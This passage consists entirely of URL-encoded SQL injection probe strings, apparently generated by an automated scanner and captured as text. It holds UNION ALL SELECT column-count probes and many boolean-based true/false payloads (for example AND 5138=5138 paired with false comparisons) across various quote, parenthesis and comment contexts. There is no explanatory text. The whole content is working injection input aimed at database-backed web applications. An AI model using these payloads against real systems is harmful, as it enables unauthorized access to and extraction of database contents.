-8968%27%20%2B%20%28SELECT%20%27wMQg%27%20WHERE%203871%3D3871%20UNION%20ALL%20SELECT%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%2C%203871%00%20%29%20%2B%20%27 -2649%27%20%2B%20%28SELECT%20%27XHDq%27%20WHERE%206941%3D6941%20UNION%20ALL%20SELECT%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%2C%206941%00%20%29%20%2B%20%27 -3778%27%20%2B%20%28SELECT%20%27PXRH%27%20WHERE%205367%3D5367%20UNION%20ALL%20SELECT%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%2C%205367%00%20%29%20%2B%20%27 -8371%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%2C%203115%00%20%23 -7340%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%2C%208092%00%20%23 -4194%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%2C%205712%00%20%23 -2939%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%2C%202546%00%20%23 -6598%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%2C%208388%00%20%23 -3600%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%2C%206510%00%20%23 -8003%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%00%20%23 -5849%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%2C%207686%00%20%23 -3273%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%2C%209068%00%20%23 -6720%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%00%20%23 #1234.5%29%28%29%27%27%28%28%22%27%28 1234.5%29%20AND%209141%3D8797 1234.5%29%20AND%205138%3D5138 1234.5%29%20AND%207097%3D3032 1234.5%27%29%20AND%202668%3D7265 1234.5%27%29%20AND%205138%3D5138 1234.5%27%29%20AND%201930%3D8345 1234.5%27%20AND%208832%3D6036 1234.5%27%20AND%205138%3D5138 1234.5%27%20AND%202908%3D4321 1234.5%22%20AND%204633%3D5776 1234.5%22%20AND%205138%3D5138 1234.5%22%20AND%204409%3D5502 1234.5%29%20AND%209012%3D3338%20AND%20%285645%3D5645 1234.5%29%20AND%205138%3D5138%20AND%20%287650%3D7650 1234.5%29%20AND%201466%3D7852%20AND%20%287880%3D7880 1234.5%29%29%20AND%209946%3D5526%20AND%20%28%282708%3D2708 1234.5%29%29%20AND%205138%3D5138%20AND%20%28%289298%3D9298 1234.5%29%29%20AND%204038%3D9529%20AND%20%28%281989%3D1989 1234.5%29%29%29%20AND%205565%3D2838%20AND%20%28%28%283883%3D3883 1234.5%29%29%29%20AND%205138%3D5138%20AND%20%28%28%288014%3D8014 1234.5%29%29%29%20AND%208436%3D3523%20AND%20%28%28%281859%3D1859 1234.5%20AND%208050%3D9275 1234.5%20AND%205138%3D5138 1234.5%20AND%208726%3D8595 1234.5%27%29%20AND%205252%3D8961%20AND%20%28%27eHko%27%3D%27eHko 1234.5%27%29%20AND%205138%3D5138%20AND%20%28%27HoRv%27%3D%27HoRv 1234.5%27%29%20AND%207926%3D6190%20AND%20%28%27QzHL%27%3D%27QzHL 1234.5%27%29%29%20AND%201418%3D1737%20AND%20%28%28%27bMCt%27%3D%27bMCt 1234.5%27%29%29%20AND%205138%3D5138%20AND%20%28%28%27YJBw%27%3D%27YJBw 1234.5%27%29%29%20AND%201614%3D9307%20AND%20%28%28%27MDrf%27%3D%27MDrf 1234.5%27%29%29%29%20AND%205274%3D8139%20AND%20%28%28%28%27JnFZ%27%3D%27JnFZ 1234.5%27%29%29%29%20AND%205138%3D5138%20AND%20%28%28%28%27oHGe%27%3D%27oHGe 1234.5%27%29%29%29%20AND%209589%3D9871%20AND%20%28%28%28%27JtcK%27%3D%27JtcK 1234.5%27%20AND%209178%3D4699%20AND%20%27lSIB%27%3D%27lSIB 1234.5%27%20AND%205138%3D5138%20AND%20%27qzfj%27%3D%27qzfj 1234.5%27%20AND%202176%3D9426%20AND%20%27XbEQ%27%3D%27XbEQ 1234.5%27%29%20AND%204007%3D5606%20AND%20%28%27xzDt%27%20LIKE%20%27xzDt 1234.5%27%29%20AND%205138%3D5138%20AND%20%28%27DwRC%27%20LIKE%20%27DwRC 1234.5%27%29%20AND%206150%3D6716%20AND%20%28%27GJiK%27%20LIKE%20%27GJiK 1234.5%27%29%29%20AND%204937%3D5706%20AND%20%28%28%27gzfM%27%20LIKE%20%27gzfM 1234.5%27%29%29%20AND%205138%3D5138%20AND%20%28%28%27FhuY%27%20LIKE%20%27FhuY 1234.5%27%29%29%20AND%205992%3D3159%20AND%20%28%28%27WgoI%27%20LIKE%20%27WgoI 1234.5%27%29%29%29%20AND%209453%3D4476%20AND%20%28%28%28%27gONK%27%20LIKE%20%27gONK 1234.5%27%29%29%29%20AND%205138%3D5138%20AND%20%28%28%28%27flBc%27%20LIKE%20%27flBc 1234.5%27%29%29%29%20AND%209310%3D7447%20AND%20%28%28%28%27iPRo%27%20LIKE%20%27iPRo 1234.5%27%20AND%209004%3D5306%20AND%20%27vZmJ%27%20LIKE%20%27vZmJ 1234.5%27%20AND%205138%3D5138%20AND%20%27MOGv%27%20LIKE%20%27MOGv 1234.5%27%20AND%209286%3D7742%20AND%20%27ZqqG%27%20LIKE%20%27ZqqG 1234.5%22%29%20AND%202149%3D6595%20AND%20%28%22RcaV%22%3D%22RcaV 1234.5%22%29%20AND%205138%3D5138%20AND%20%28%22iMuK%22%3D%22iMuK 1234.5%22%29%20AND%201346%3D6077%20AND%20%28%22fWla%22%3D%22fWla 1234.5%22%29%29%20AND%209356%3D6334%20AND%20%28%28%22vstU%22%3D%22vstU 1234.5%22%29%29%20AND%205138%3D5138%20AND%20%28%28%22vITD%22%3D%22vITD 1234.5%22%29%29%20AND%207051%3D9850%20AND%20%28%28%22vyfp%22%3D%22vyfp 1234.5%22%29%29%29%20AND%207739%3D9880%20AND%20%28%28%28%22euRF%22%3D%22euRF 1234.5%22%29%29%29%20AND%205138%3D5138%20AND%20%28%28%28%22IoYV%22%3D%22IoYV 1234.5%22%29%29%29%20AND%209571%3D5028%20AND%20%28%28%28%22jskW%22%3D%22jskW 1234.5%22%20AND%203936%3D5019%20AND%20%22LTYR%22%3D%22LTYR 1234.5%22%20AND%205138%3D5138%20AND%20%22DUJm%22%3D%22DUJm 1234.5%22%20AND%204628%3D4277%20AND%20%22smCq%22%3D%22smCq 1234.5%22%29%20AND%207509%3D8944%20AND%20%28%22Vdyb%22%20LIKE%20%22Vdyb 1234.5%22%29%20AND%205138%3D5138%20AND%20%28%22elGz%22%20LIKE%20%22elGz 1234.5%22%29%20AND%203756%3D3526%20AND%20%28%22jBXK%22%20LIKE%20%22jBXK 1234.5%22%29%29%20AND%203469%3D7934%20AND%20%28%28%22IHFT%22%20LIKE%20%22IHFT 1234.5%22%29%29%20AND%205138%3D5138%20AND%20%28%28%22LZvG%22%20LIKE%20%22LZvG 1234.5%22%29%29%20AND%204426%3D9591%20AND%20%28%28%22fHeZ%22%20LIKE%20%22fHeZ 1234.5%22%29%29%29%20AND%208911%3D5071%20AND%20%28%28%28%22AGCC%22%20LIKE%20%22AGCC 1234.5%22%29%29%29%20AND%205138%3D5138%20AND%20%28%28%28%22coSy%22%20LIKE%20%22coSy 1234.5%22%29%29%29%20AND%209082%3D1118%20AND%20%28%28%28%22Ubfi%22%20LIKE%20%22Ubfi 1234.5%22%20AND%201439%3D8818%20AND%20%22GcAr%22%20LIKE%20%22GcAr 1234.5%22%20AND%205138%3D5138%20AND%20%22WFnL%22%20LIKE%20%22WFnL 1234.5%22%20AND%208314%3D1800%20AND%20%22nmmc%22%20LIKE%20%22nmmc 1234.5%29%20WHERE%201566%3D1566%20AND%203396%3D3009 1234.5%29%20WHERE%205427%3D5427%20AND%205138%3D5138 1234.5%29%20WHERE%204303%3D4303%20AND%207601%3D8179 1234.5%27%29%20WHERE%202797%3D2797%20AND%206573%3D7548 1234.5%27%29%20WHERE%204339%3D4339%20AND%205138%3D5138 1234.5%27%29%20WHERE%202335%3D2335%20AND%208031%3D1257 1234.5%27%20WHERE%204400%3D4400%20AND%209170%3D2610 1234.5%27%20WHERE%204271%3D4271%20AND%205138%3D5138 1234.5%27%20WHERE%205093%3D5093%20AND%201548%3D6278 1234.5%22%20WHERE%203197%3D3197%20AND%209566%3D6884 1234.5%22%20WHERE%201211%3D1211%20AND%205138%3D5138 1234.5%22%20WHERE%207714%3D7714%20AND%202206%3D8428 1234.5%27%20%7C%7C%20%28SELECT%206231%20FROM%20DUAL%20WHERE%202927%3D2927%20AND%206752%3D4836%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203544%20FROM%20DUAL%20WHERE%202702%3D2702%20AND%205138%3D5138%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205265%20FROM%20DUAL%20WHERE%201731%3D1731%20AND%202101%3D5884%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202452%20WHERE%209368%3D9368%20AND%203219%3D6554%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208283%20WHERE%204848%3D4848%20AND%205138%3D5138%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206474%20WHERE%205725%3D5725%20AND%209800%3D1076%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207734%20FROM%20DUAL%20WHERE%202436%3D2436%20AND%202962%3D5767%20%29 1234.5%20%2B%20%28SELECT%205406%20FROM%20DUAL%20WHERE%209117%3D9117%20AND%205138%3D5138%20%29 1234.5%20%2B%20%28SELECT%208368%20FROM%20DUAL%20WHERE%201258%3D1258%20AND%205417%3D8815%20%29 1234.5%20%2B%20%28SELECT%208758%20WHERE%204522%3D4522%20AND%206559%3D1062%20%29 1234.5%20%2B%20%28SELECT%203819%20WHERE%208778%3D8778%20AND%205138%3D5138%20%29 1234.5%20%2B%20%28SELECT%204280%20WHERE%202459%3D2459%20AND%205934%3D3253%20%29 1234.5%27%20%2B%20%28SELECT%20%27EopC%27%20FROM%20DUAL%20WHERE%209443%3D9443%20AND%208120%3D1940%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YcTH%27%20FROM%20DUAL%20WHERE%203991%3D3991%20AND%205138%3D5138%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27GShl%27%20FROM%20DUAL%20WHERE%208656%3D8656%20AND%209672%3D5156%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27PslV%27%20WHERE%208569%3D8569%20AND%201253%3D9420%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RqEN%27%20WHERE%205661%3D5661%20AND%205138%3D5138%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27MtYh%27%20WHERE%202168%3D2168%20AND%201590%3D1095%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201705%3D9815%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205138%3D5138%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%208297%3D9885%20%23 1234.5%29%20AND%203648%3D4730%23 1234.5%29%20AND%202468%3D2468%23 1234.5%29%20AND%208490%3D4788%23 1234.5%27%29%20AND%206327%3D9254%23 1234.5%27%29%20AND%202468%3D2468%23 1234.5%27%29%20AND%208389%3D8828%23 1234.5%27%20AND%201193%3D8696%23 1234.5%27%20AND%202468%3D2468%23 1234.5%27%20AND%203087%3D2175%23 1234.5%22%20AND%206668%3D5665%23 1234.5%22%20AND%202468%3D2468%23 1234.5%22%20AND%205753%3D2637%23 1234.5%29%20AND%202400%3D4353%23%20AND%20%285328%3D5328 1234.5%29%20AND%202468%3D2468%23%20AND%20%288438%3D8438 1234.5%29%20AND%203866%3D1090%23%20AND%20%286965%3D6965 1234.5%29%29%20AND%209792%3D3977%23%20AND%20%28%286182%3D6182 1234.5%29%29%20AND%202468%3D2468%23%20AND%20%28%285904%3D5904 1234.5%29%29%20AND%209510%3D7966%23%20AND%20%28%283040%3D3040 1234.5%29%29%29%20AND%207326%3D1907%23%20AND%20%28%28%281626%3D1626 1234.5%29%29%29%20AND%202468%3D2468%23%20AND%20%28%28%287853%3D7853 1234.5%29%29%29%20AND%201978%3D8534%23%20AND%20%28%28%286543%3D6543 1234.5%20AND%206412%3D8803%23 1234.5%20AND%202468%3D2468%23 1234.5%20AND%208163%3D2359%23 1234.5%27%29%20AND%207050%3D8871%23%20AND%20%28%27nsaq%27%3D%27nsaq 1234.5%27%29%20AND%202468%3D2468%23%20AND%20%28%27HADf%27%3D%27HADf 1234.5%27%29%20AND%206917%3D3892%23%20AND%20%28%27aaoH%27%3D%27aaoH 1234.5%27%29%29%20AND%205711%3D7665%23%20AND%20%28%28%27vgUh%27%3D%27vgUh 1234.5%27%29%29%20AND%202468%3D2468%23%20AND%20%28%28%27mnFD%27%3D%27mnFD 1234.5%27%29%29%20AND%201750%3D9772%23%20AND%20%28%28%27ZQVp%27%3D%27ZQVp 1234.5%27%29%29%29%20AND%206219%3D4369%23%20AND%20%28%28%28%27Gurn%27%3D%27Gurn 1234.5%27%29%29%29%20AND%202468%3D2468%23%20AND%20%28%28%28%27lgFc%27%3D%27lgFc 1234.5%27%29%29%29%20AND%206048%3D3429%23%20AND%20%28%28%28%27hpdN%27%3D%27hpdN 1234.5%27%20AND%202705%3D8943%23%20AND%20%27kuGB%27%3D%27kuGB 1234.5%27%20AND%202468%3D2468%23%20AND%20%27JUtI%27%3D%27JUtI 1234.5%27%20AND%209986%3D9625%23%20AND%20%27CjIp%27%3D%27CjIp 1234.5%27%29%20AND%209121%3D9174%23%20AND%20%28%27hQhM%27%20LIKE%20%27hQhM 1234.5%27%29%20AND%202468%3D2468%23%20AND%20%28%27LLSV%27%20LIKE%20%27LLSV 1234.5%27%29%20AND%202222%3D9401%23%20AND%20%28%27JUaw%27%20LIKE%20%27JUaw 1234.5%27%29%29%20AND%201916%3D2157%23%20AND%20%28%28%27Uyen%27%20LIKE%20%27Uyen 1234.5%27%29%29%20AND%202468%3D2468%23%20AND%20%28%28%27KoPH%27%20LIKE%20%27KoPH 1234.5%27%29%29%20AND%201550%3D9211%23%20AND%20%28%28%27HUnh%27%20LIKE%20%27HUnh 1234.5%27%29%29%29%20AND%203265%3D7300%23%20AND%20%28%28%28%27ubRP%27%20LIKE%20%27ubRP 1234.5%27%29%29%29%20AND%202468%3D2468%23%20AND%20%28%28%28%27UADW%27%20LIKE%20%27UADW 1234.5%27%29%29%29%20AND%209530%3D6136%23%20AND%20%28%28%28%27zNdn%27%20LIKE%20%27zNdn 1234.5%27%20AND%203968%3D7167%23%20AND%20%27qlmJ%27%20LIKE%20%27qlmJ 1234.5%27%20AND%202468%3D2468%23%20AND%20%27fwEJ%27%20LIKE%20%27fwEJ 1234.5%27%20AND%202440%3D5116%23%20AND%20%27QBSK%27%20LIKE%20%27QBSK 1234.5%22%29%20AND%204612%3D2303%23%20AND%20%28%22CUfA%22%3D%22CUfA 1234.5%22%29%20AND%202468%3D2468%23%20AND%20%28%22RJIF%22%3D%22RJIF 1234.5%22%29%20AND%203371%3D6253%23%20AND%20%28%22oVvg%22%3D%22oVvg 1234.5%22%29%29%20AND%204171%3D4843%23%20AND%20%28%28%22EZgf%22%3D%22EZgf 1234.5%22%29%29%20AND%202468%3D2468%23%20AND%20%28%28%22vZlC%22%3D%22vZlC 1234.5%22%29%29%20AND%205020%3D5329%23%20AND%20%28%28%22tZQG%22%3D%22tZQG 1234.5%22%29%29%29%20AND%209722%3D6108%23%20AND%20%28%28%28%22mcEX%22%3D%22mcEX 1234.5%22%29%29%29%20AND%202468%3D2468%23%20AND%20%28%28%28%22FwLs%22%3D%22FwLs 1234.5%22%29%29%29%20AND%206750%3D8228%23%20AND%20%28%28%28%22Walx%22%3D%22Walx 1234.5%22%20AND%205105%3D9691%23%20AND%20%22TkEj%22%3D%22TkEj 1234.5%22%20AND%202468%3D2468%23%20AND%20%22kvOj%22%3D%22kvOj 1234.5%22%20AND%203080%3D6610%23%20AND%20%22jAkU%22%3D%22jAkU 1234.5%22%29%20AND%203637%3D5270%23%20AND%20%28%22HkKi%22%20LIKE%20%22HkKi 1234.5%22%29%20AND%202468%3D2468%23%20AND%20%28%22sORR%22%20LIKE%20%22sORR 1234.5%22%29%20AND%206269%3D1792%23%20AND%20%28%22rXRY%22%20LIKE%20%22rXRY 1234.5%22%29%29%20AND%209111%3D9575%23%20AND%20%28%28%22pQYQ%22%20LIKE%20%22pQYQ 1234.5%22%29%29%20AND%202468%3D2468%23%20AND%20%28%28%22xDwh%22%20LIKE%20%22xDwh 1234.5%22%29%29%20AND%209033%3D3909%23%20AND%20%28%28%22CnNg%22%20LIKE%20%22CnNg 1234.5%22%29%29%29%20AND%205010%3D1367%23%20AND%20%28%28%28%22dRWJ%22%20LIKE%20%22dRWJ 1234.5%22%29%29%29%20AND%202468%3D2468%23%20AND%20%28%28%28%22CDIv%22%20LIKE%20%22CDIv 1234.5%22%29%29%29%20AND%202498%3D5160%23%20AND%20%28%28%28%22OIiq%22%20LIKE%20%22OIiq 1234.5%22%20AND%201065%3D6894%23%20AND%20%22PcPH%22%20LIKE%20%22PcPH 1234.5%22%20AND%202468%3D2468%23%20AND%20%22fdYc%22%20LIKE%20%22fdYc 1234.5%22%20AND%206186%3D6446%23%20AND%20%22gKzC%22%20LIKE%20%22gKzC 1234.5%29%20WHERE%206640%3D6640%20AND%206543%3D9464%23 1234.5%29%20WHERE%209092%3D9092%20AND%202468%3D2468%23 1234.5%29%20WHERE%204445%3D4445%20AND%202937%3D9323%23 1234.5%27%29%20WHERE%205128%3D5128%20AND%206405%3D1710%23 1234.5%27%29%20WHERE%208973%3D8973%20AND%202468%3D2468%23 1234.5%27%29%20WHERE%207471%3D7471%20AND%205003%3D2884%23 1234.5%27%20WHERE%207066%3D7066%20AND%202394%3D1033%23 1234.5%27%20WHERE%201132%3D1132%20AND%202468%3D2468%23 1234.5%27%20WHERE%208826%3D8826%20AND%206729%3D1438%23 1234.5%22%20WHERE%208779%3D8779%20AND%205196%3D5273%23 1234.5%22%20WHERE%204122%3D4122%20AND%202468%3D2468%23 1234.5%22%20WHERE%205788%3D5788%20AND%205651%3D3367%23 1234.5%27%20%7C%7C%20%28SELECT%205197%20FROM%20DUAL%20WHERE%202651%3D2651%20AND%208777%3D5586%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203847%20FROM%20DUAL%20WHERE%207941%3D7941%20AND%202468%3D2468%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209838%20FROM%20DUAL%20WHERE%203810%3D3810%20AND%209105%3D4293%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206326%20WHERE%208656%3D8656%20AND%201697%3D9745%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209397%20WHERE%205028%3D5028%20AND%202468%3D2468%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202332%20WHERE%206403%3D6403%20AND%204865%3D5125%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208869%20FROM%20DUAL%20WHERE%202999%3D2999%20AND%202151%3D5476%23%20%29 1234.5%20%2B%20%28SELECT%209845%20FROM%20DUAL%20WHERE%208929%3D8929%20AND%202468%3D2468%23%20%29 1234.5%20%2B%20%28SELECT%202150%20FROM%20DUAL%20WHERE%209763%3D9763%20AND%205149%3D9363%23%20%29 1234.5%20%2B%20%28SELECT%208222%20WHERE%209693%3D9693%20AND%204431%3D3237%23%20%29 1234.5%20%2B%20%28SELECT%201183%20WHERE%205782%3D5782%20AND%202468%3D2468%23%20%29 1234.5%20%2B%20%28SELECT%208828%20WHERE%202319%3D2319%20AND%207600%3D6325%23%20%29 1234.5%27%20%2B%20%28SELECT%20%27GhqI%27%20FROM%20DUAL%20WHERE%203417%3D3417%20AND%202223%3D4540%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lSMO%27%20FROM%20DUAL%20WHERE%204536%3D4536%20AND%202468%3D2468%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27WuSo%27%20FROM%20DUAL%20WHERE%205034%3D5034%20AND%202766%3D4045%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mJcZ%27%20WHERE%208886%3D8886%20AND%205189%3D8482%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ovie%27%20WHERE%203490%3D3490%20AND%202468%3D2468%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27YhLF%27%20WHERE%204048%3D4048%20AND%202752%3D2981%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209059%3D2538%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%202468%3D2468%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207030%3D5252%23%20%23 1234.5%29%20AND%207039%3D8535--%20 1234.5%29%20AND%204158%3D4158--%20 1234.5%29%20AND%205752%3D2360--%20 1234.5%27%29%20AND%203498%3D7668--%20 1234.5%27%29%20AND%204158%3D4158--%20 1234.5%27%29%20AND%204468%3D4259--%20 1234.5%27%20AND%204213%3D4420--%20 1234.5%27%20AND%204158%3D4158--%20 1234.5%27%20AND%206372%3D5777--%20 1234.5%22%20AND%202545%3D6667--%20 1234.5%22%20AND%204158%3D4158--%20 1234.5%22%20AND%201061%3D1928--%20 1234.5%29%20AND%208464%3D1904--%20%20AND%20%287830%3D7830 1234.5%29%20AND%204158%3D4158--%20%20AND%20%281878%3D1878 1234.5%29%20AND%202696%3D6711--%20%20AND%20%287858%3D7858 1234.5%29%29%20AND%208320%3D6509--%20%20AND%20%28%281152%3D1152 1234.5%29%29%20AND%204158%3D4158--%20%20AND%20%28%284637%3D4637 1234.5%29%29%20AND%201813%3D4808--%20%20AND%20%28%289402%3D9402 1234.5%29%29%29%20AND%206572%3D2982--%20%20AND%20%28%28%284960%3D4960 1234.5%29%29%29%20AND%204158%3D4158--%20%20AND%20%28%28%283628%3D3628 1234.5%29%29%29%20AND%202195%3D1351--%20%20AND%20%28%28%283468%3D3468 1234.5%20AND%201122%3D3635--%20 1234.5%20AND%204158%3D4158--%20 1234.5%20AND%207879%3D8284--%20 1234.5%27%29%20AND%209147%3D9811--%20%20AND%20%28%27NErM%27%3D%27NErM 1234.5%27%29%20AND%204158%3D4158--%20%20AND%20%28%27nlUb%27%3D%27nlUb 1234.5%27%29%20AND%204228%3D1046--%20%20AND%20%28%27fHCj%27%3D%27fHCj 1234.5%27%29%29%20AND%209830%3D3290--%20%20AND%20%28%28%27UfEm%27%3D%27UfEm 